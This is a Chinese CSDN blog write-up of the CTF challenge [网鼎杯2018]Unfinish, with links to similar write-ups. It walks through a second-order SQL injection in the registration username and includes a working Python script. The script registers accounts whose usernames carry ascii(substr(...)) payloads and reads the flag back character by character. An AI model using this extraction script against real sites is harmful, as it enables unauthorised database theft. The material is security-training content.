[网鼎杯2018]Unfinish

最新推荐文章于 2024-04-27 19:27:41 发布
最新推荐文章于 2024-04-27 19:27:41 发布
阅读量810 收藏 2
点赞数 7
分类专栏: writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fightte/article/details/117224701
版权

SQL注入 二次注入 Web安全 Flag提取 Python脚本
关键词由CSDN通过智能技术生成

[网鼎杯2018]Unfinish

熟悉的二次注入:
在这里插入图片描述在这里插入图片描述是sql注入题目:
在这里插入图片描述常见的目录规则,让人想起register.php,扫描目录也扫出来了:
在这里插入图片描述注册:
在这里插入图片描述登录进去,搜寻信息:
在这里插入图片描述用户名被显示出来,试试二次注入:
注册用户名 '1’and’0
在这里插入图片描述确实存在,自己写脚本去爆吧:
在这里插入图片描述注册发包的格式:(如上图)

在这里插入图片描述写脚本要提取出该用户名的内容:

url =' http://e216dce0-dd95-4585-90a3-b0d9f3963582.node3.buuoj.cn/'


flag =''

url_login = url + 'login.php'
url_register = url + 'register.php'
url_index = url +'index.php'

for i in range(100):
	sleep(0.2)
	data_reg = {"email":"8888{}@qq.com".format(i),"username":"0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}
	data_log = {"email" : "8888{}@qq.com".format(i), "password" : "123"} 

	r1=requests.post(url_register,data=data_reg)
	r2=requests.post(url_login,data=data_log)
	#r3=requests.get(url_index)
	
	res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)
	res1 = re.search(r'\d+', res.group())
	flag = flag+chr(int(res1.group()))
	print(flag)

\s提取空格,\d提取所有数字,\d+则提取出第一个数字,group()只输出其数据,输出的是ASCLL码形式,转换一下在拼在一起:
在这里插入图片描述

F1gh4
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1136
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
网鼎杯 2018 unfinish
feng的博客
10-29 2709
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
Part_CAE_Unfinish.rar
06-15
在“Part_CAE_Unfinish.rar”这个压缩包中,我们可能找到一系列与UG有限元分析相关的实例教程,这对于初学者来说是极好的学习资源。 在有限元分析中,首先需要对模型进行网格划分,UG提供了多种网格类型,如四面体...
微信小程序 setData 对 data数据影响问题
10-17
uniqueitem: (id == 'unfinish') ? this.data.itemleft[index] : this.data.itemright[index], baninput: (id == 'unfinish')?false:true }); var that = this; wx.getStorage({ key: 'item', success: ...
[网鼎杯2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 731
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
网鼎杯-2018-unfinish解题方法
最新发布
Lemon_miko的博客
04-27 542
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
XCTF:unfinish2018网鼎杯)(SQL二次注入)
羽的博客
09-14 1078
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 795
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽
不会编程的崽的博客
03-26 1195
网鼎杯 二次注入 盲注
[CTF 真题] 2018-网鼎杯-Web-Unfinish
weixin_43586169的博客
07-22 1174
首先进行一个扫描,发现注册与登陆页面,通过观察发现可能存在二次注入,尝试注册一个带有SQL语句的账号,然后登陆这个账号查看显示用户名的地方是否进行了执行,返回的是否是数据库中的数据。通过脚本批量注册,然后进行登陆,最后获得Flag。...
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
Aiwin的博客
05-18 1133
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
SQL注入:网鼎杯2018-unfinish
qq_68163788的博客
02-21 1267
SQL注入是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库中插入恶意的SQL代码,从而实现对数据库的非法访问或控制。攻击者可以通过SQL注入攻击获取敏感数据、修改数据、删除数据,甚至完全控制数据库
网鼎杯2018:登录页面SQL注入分析
"[网鼎杯 2018]unfinish.md" 这篇描述涉及到的是一个网络安全竞赛中的CTF(Capture The Flag)挑战,特别是关于SQL注入的题目。题目中给出的场景是一个登录页面`/login.php`,并且推测有一个注册页面`/register....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

F1gh4

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值